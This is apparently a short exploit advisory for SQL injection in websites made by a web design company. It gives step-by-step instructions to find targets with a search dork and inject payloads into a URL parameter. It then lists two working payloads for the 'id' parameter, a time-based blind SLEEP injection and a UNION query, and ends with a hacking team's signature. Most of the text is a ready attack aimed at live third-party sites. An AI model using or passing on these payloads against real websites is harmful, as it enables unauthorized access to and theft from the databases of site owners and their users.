# Exploit Author: Aryan Chehreghani
# Vendor Homepage: http://www.sabawww.ir
# Tested on: Windows
# CVE : N/A
=========================================
#Description
Saba Website Design, web application design and programming.
#poc
Step 1 - Find Your Target Using Dork.
Step 2 - Find Open Value In Websites Url.
Step 3 - Inject Your Payloads in URL.
#TEST
Parameter: id (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=34' AND (SELECT 2894 FROM (SELECT(SLEEP(5)))vkbX) AND 'lVCi'='lVCi
Type: UNION query
Title: Generic UNION query (NULL) - 6 columns
Payload: id=-5154' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x716a627a71,0x4447597349626678774f754a64756965554469767562416c576b6956417a59764a654c5565435755,0x7176767171)-- -
==================================================
/*/ TAPESH DIGITAL SECURITY TEAM IRAN / T.ME/ICTUS_TM تیم امنیت سایبری اپش